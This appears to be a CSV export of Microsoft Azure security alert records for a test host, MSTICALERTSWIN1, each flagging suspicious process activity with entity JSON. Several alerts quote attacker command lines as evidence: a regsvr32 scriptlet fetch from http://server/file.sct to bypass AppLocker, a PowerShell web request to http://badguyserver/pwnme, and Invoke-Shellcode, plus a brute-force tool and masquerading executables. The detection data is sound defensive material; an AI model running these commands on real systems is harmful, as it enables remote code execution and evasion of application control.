132,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 11:45:01,2019-01-15 11:45:01,f3490cf7-a303-4001-b7d6-8acf7e83f191,2518547480989617678_f3490cf7-a303-4001-b7d6-8acf7e83f191,Detection,Microsoft,Potential attempt to bypass AppLocker detected,Potential attempt to bypass AppLocker detected,Potential attempt to bypass AppLocker detected,"Analysis of host data on MSTICALERTSWIN1 detected a potential attempt to bypass AppLocker restrictions. AppLocker can be configured to implement a policy that limits what executables are allowed to run on a Windows system. The command line pattern similar to that identified in this alert has been previously associated with attacker attempts to circumvent AppLocker policy by using trusted executables (allowed by AppLocker policy) to execute untrusted code. This could be legitimate activity, or an indication of a compromised host.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""WORKGROUP\\MSTICAlertsWin1$"",
""Account Session Id"": ""0x3e4"",
""Suspicious Process"": ""c:\\diagnostics\\systmp\\regsvr32.exe"",
""Suspicious Command Line"": "".\\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x16f0"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x122c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAlertsWin1$"",
""NTDomain"": ""WORKGROUP"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-20"",
""IsDomainJoined"": true,
""Type"": ""account"",
""LogonId"": ""0x3e4""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\systmp"",
""Name"": ""regsvr32.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x16f0"",
""CommandLine"": "".\\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T11:45:01.0382321Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x3e4"",
""StartTimeUtc"": ""2019-01-15T11:45:01.0382321Z"",
""EndTimeUtc"": ""2019-01-15T11:45:01.0382321Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 11:45:03,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
133,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 11:45:02,2019-01-15 11:45:02,c0558adc-b4a9-4289-b9ad-7e7260f1cde0,2518547480970182118_c0558adc-b4a9-4289-b9ad-7e7260f1cde0,Detection,Microsoft,Detected anomalous mix of upper and lower case characters in command-line,Detected anomalous mix of upper and lower case characters in command-line,Detected anomalous mix of upper and lower case characters in command-line,"Analysis of host data on MSTICALERTSWIN1 detected a command-line with anomalous mix of upper and lower case characters. This kind of pattern, while possibly benign, is also typical of attackers trying to hide from case-sensitive or hash-based rule matching when performing administrative tasks on a compromised host.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""WORKGROUP\\MSTICAlertsWin1$"",
""Account Session Id"": ""0x3e4"",
""Suspicious Process"": ""c:\\diagnostics\\systmp\\rundll32.exe"",
""Suspicious Command Line"": "".\\rundll32 /c shell32control_randll.dll"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x11f8"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x122c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAlertsWin1$"",
""NTDomain"": ""WORKGROUP"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-20"",
""IsDomainJoined"": true,
""Type"": ""account"",
""LogonId"": ""0x3e4""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\systmp"",
""Name"": ""rundll32.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x11f8"",
""CommandLine"": "".\\rundll32 /c shell32control_randll.dll"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T11:45:02.9817881Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x3e4"",
""StartTimeUtc"": ""2019-01-15T11:45:02.9817881Z"",
""EndTimeUtc"": ""2019-01-15T11:45:02.9817881Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 11:45:06,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
134,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 11:45:01,2019-01-15 11:45:01,24a6d6f3-acf1-41bd-a11f-01a1369bac02,2518547480982973701_24a6d6f3-acf1-41bd-a11f-01a1369bac02,Detection,Microsoft,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,"Analysis of host data detected a powershell script running on MSTICALERTSWIN1 that has features in common with known suspicious scripts. This script could either be legitimate activity, or an indication of a compromised host.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""WORKGROUP\\MSTICAlertsWin1$"",
""Account Session Id"": ""0x3e4"",
""Suspicious Process"": ""c:\\diagnostics\\systmp\\powershell.exe"",
""Suspicious Command Line"": "".\\powershell invoke-reversednslookup.ps1"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1378"",
""Suspicious Script"": "".\\powershell Invoke-ReverseDnsLookup.ps1"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x122c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAlertsWin1$"",
""NTDomain"": ""WORKGROUP"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-20"",
""IsDomainJoined"": true,
""Type"": ""account"",
""LogonId"": ""0x3e4""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\systmp"",
""Name"": ""powershell.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1378"",
""CommandLine"": "".\\powershell invoke-reversednslookup.ps1"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T11:45:01.7026298Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x3e4"",
""StartTimeUtc"": ""2019-01-15T11:45:01.7026298Z"",
""EndTimeUtc"": ""2019-01-15T11:45:01.7026298Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 11:45:06,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
135,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 11:45:04,2019-01-15 11:45:04,b66e93d7-b38b-4785-baa5-093edc18e649,2518547480956885358_b66e93d7-b38b-4785-baa5-093edc18e649,Detection,Microsoft,Random process name detected,Random process name detected,Random process name detected,Suspiciously constructed process name detected: c:\diagnostics\systmp\sdopfjiowtbkjfnbeioruj.exe,Informational,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""WORKGROUP\\MSTICAlertsWin1$"",
""Account Session Id"": ""0x3e4"",
""Suspicious Process"": ""c:\\diagnostics\\systmp\\sdopfjiowtbkjfnbeioruj.exe"",
""Suspicious Command Line"": ""c:\\diagnostics\\systmp\\sdopfjiowtbkjfnbeioruj.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x176c"",
""ModelScore"": ""-21.83"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x122c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAlertsWin1$"",
""NTDomain"": ""WORKGROUP"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-20"",
""IsDomainJoined"": true,
""Type"": ""account"",
""LogonId"": ""0x3e4""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\systmp"",
""Name"": ""sdopfjiowtbkjfnbeioruj.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x176c"",
""CommandLine"": ""c:\\diagnostics\\systmp\\sdopfjiowtbkjfnbeioruj.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T11:45:04.3114641Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x3e4"",
""StartTimeUtc"": ""2019-01-15T11:45:04.3114641Z"",
""EndTimeUtc"": ""2019-01-15T11:45:04.3114641Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 11:45:06,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
136,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 11:45:01,2019-01-15 11:45:01,d46877bd-e04d-401a-99bd-eec2a6b25663,2518547480984263491_d46877bd-e04d-401a-99bd-eec2a6b25663,Detection,Microsoft,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,"Analysis of host data detected a powershell script running on MSTICALERTSWIN1 that has features in common with known suspicious scripts. This script could either be legitimate activity, or an indication of a compromised host.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""WORKGROUP\\MSTICAlertsWin1$"",
""Account Session Id"": ""0x3e4"",
""Suspicious Process"": ""c:\\diagnostics\\systmp\\powershell.exe"",
""Suspicious Command Line"": "".\\powershell -noninteractive -noprofile -command \""invoke-expression get-process; invoke-webrequest -uri http://badguyserver/pwnme\"""",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1410"",
""Suspicious Script"": "".\\powershell -Noninteractive -Noprofile -Command \""Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\"""",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x122c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAlertsWin1$"",
""NTDomain"": ""WORKGROUP"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-20"",
""IsDomainJoined"": true,
""Type"": ""account"",
""LogonId"": ""0x3e4""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\systmp"",
""Name"": ""powershell.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1410"",
""CommandLine"": "".\\powershell -noninteractive -noprofile -command \""invoke-expression get-process; invoke-webrequest -uri http://badguyserver/pwnme\"""",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T11:45:01.5736508Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x3e4"",
""StartTimeUtc"": ""2019-01-15T11:45:01.5736508Z"",
""EndTimeUtc"": ""2019-01-15T11:45:01.5736508Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 11:45:06,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
137,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 11:45:02,2019-01-15 11:45:02,492fbb97-a1fc-4880-95d2-e55ab2f142b6,2518547480977057409_492fbb97-a1fc-4880-95d2-e55ab2f142b6,Detection,Microsoft,Suspicious system process executed,Suspicious system process executed,Suspicious system process executed,The system process c:\windows\fonts\csrss.exe was observed running in an abnormal context. Malware often use this process name to masquerade its malicious activity.,Medium,False,"{
""user name"": ""WORKGROUP\\MSTICAlertsWin1$"",
""process name"": ""c:\\windows\\fonts\\csrss.exe"",
""command line"": ""c:\\windows\\fonts\\csrss.exe"",
""parent process"": ""cmd.exe"",
""process id"": ""0x15e8"",
""account logon id"": ""0x3e4"",
""User SID"": ""S-1-5-20"",
""parent process id"": ""0x122c"",
""System Process"": ""CSRSS.EXE"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x122c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAlertsWin1$"",
""NTDomain"": ""WORKGROUP"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-20"",
""IsDomainJoined"": true,
""Type"": ""account"",
""LogonId"": ""0x3e4""
},
{
""$id"": ""8"",
""Directory"": ""c:\\windows\\fonts"",
""Name"": ""csrss.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x15e8"",
""CommandLine"": ""c:\\windows\\fonts\\csrss.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T11:45:02.294259Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x3e4"",
""StartTimeUtc"": ""2019-01-15T11:45:02.294259Z"",
""EndTimeUtc"": ""2019-01-15T11:45:02.294259Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 11:45:06,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,
138,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 11:45:03,2019-01-15 11:45:03,88eb8a87-a876-46aa-b8ed-be7298929ea8,2518547480968677354_88eb8a87-a876-46aa-b8ed-be7298929ea8,Detection,Microsoft,Suspicious process executed,Suspicious process executed,Suspicious process executed,Machine logs indicate that the suspicious process: 'c:\diagnostics\systmp\dubrute.exe' was running on the machine; this process is associated with carrying out brute force attacks. An attacker may have compromised this host as a launchpad for carrying out further attacks.',High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""WORKGROUP\\MSTICAlertsWin1$"",
""Account Session Id"": ""0x3e4"",
""Suspicious Process"": ""c:\\diagnostics\\systmp\\dubrute.exe"",
""Suspicious Command Line"": "".\\dubrute.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1604"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x122c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAlertsWin1$"",
""NTDomain"": ""WORKGROUP"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-20"",
""IsDomainJoined"": true,
""Type"": ""account"",
""LogonId"": ""0x3e4""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\systmp"",
""Name"": ""dubrute.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1604"",
""CommandLine"": "".\\dubrute.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T11:45:03.1322645Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x3e4"",
""StartTimeUtc"": ""2019-01-15T11:45:03.1322645Z"",
""EndTimeUtc"": ""2019-01-15T11:45:03.1322645Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 11:45:06,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
139,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 11:45:04,2019-01-15 11:45:04,2b59c1d5-a815-4562-a8d4-36d9777e6546,2518547480956378190_2b59c1d5-a815-4562-a8d4-36d9777e6546,Detection,Microsoft,Suspicious double extension file executed,Suspicious double extension file executed,Suspicious double extension file executed,"Analysis of host data indicates an execution of a process with a suspicious double extension.
This extension may trick users into thinking files are safe to be opened and might indicate the presence of malware on the system.",High,False,"{
""user name"": ""WORKGROUP\\MSTICAlertsWin1$"",
""process name"": ""c:\\diagnostics\\systmp\\doubleextension.pdf.exe"",
""command line"": ""c:\\diagnostics\\systmp\\doubleextension.pdf.exe"",
""parent process"": ""cmd.exe"",
""process id"": ""0x15dc"",
""account logon id"": ""0x3e4"",
""User SID"": ""S-1-5-20"",
""parent process id"": ""0x122c"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Suspicious Double Extensions\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Suspicious-Double-Extensions.pdf?sv=2018-03-28&sr=b&sig=fnAjscV5Un28sgEeHYRuQ8blKChnbCPuuVZzNMfJEH8%3D&spr=https&st=2019-01-14T15:33:03Z&se=2019-04-14T15:48:03Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=344d72a7-1b67-426c-bb5a-c14a81f7e675\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x122c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAlertsWin1$"",
""NTDomain"": ""WORKGROUP"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-20"",
""IsDomainJoined"": true,
""Type"": ""account"",
""LogonId"": ""0x3e4""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\systmp"",
""Name"": ""doubleextension.pdf.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x15dc"",
""CommandLine"": ""c:\\diagnostics\\systmp\\doubleextension.pdf.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T11:45:04.3621809Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x3e4"",
""StartTimeUtc"": ""2019-01-15T11:45:04.3621809Z"",
""EndTimeUtc"": ""2019-01-15T11:45:04.3621809Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 11:45:06,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,
140,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 11:45:01,2019-01-15 11:45:01,9da8e3df-9c3b-4e20-8bd0-ace00aff9def,2518547480983467170_9da8e3df-9c3b-4e20-8bd0-ace00aff9def,Detection,Microsoft,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,"Analysis of host data detected a powershell script running on MSTICALERTSWIN1 that has features in common with known suspicious scripts. This script could either be legitimate activity, or an indication of a compromised host.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""WORKGROUP\\MSTICAlertsWin1$"",
""Account Session Id"": ""0x3e4"",
""Suspicious Process"": ""c:\\diagnostics\\systmp\\powershell.exe"",
""Suspicious Command Line"": "".\\powershell invoke-shellcode.ps1"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0xe68"",
""Suspicious Script"": "".\\powershell Invoke-Shellcode.ps1"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x122c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAlertsWin1$"",
""NTDomain"": ""WORKGROUP"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-20"",
""IsDomainJoined"": true,
""Type"": ""account"",
""LogonId"": ""0x3e4""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\systmp"",
""Name"": ""powershell.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0xe68"",
""CommandLine"": "".\\powershell invoke-shellcode.ps1"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T11:45:01.6532829Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x3e4"",
""StartTimeUtc"": ""2019-01-15T11:45:01.6532829Z"",
""EndTimeUtc"": ""2019-01-15T11:45:01.6532829Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
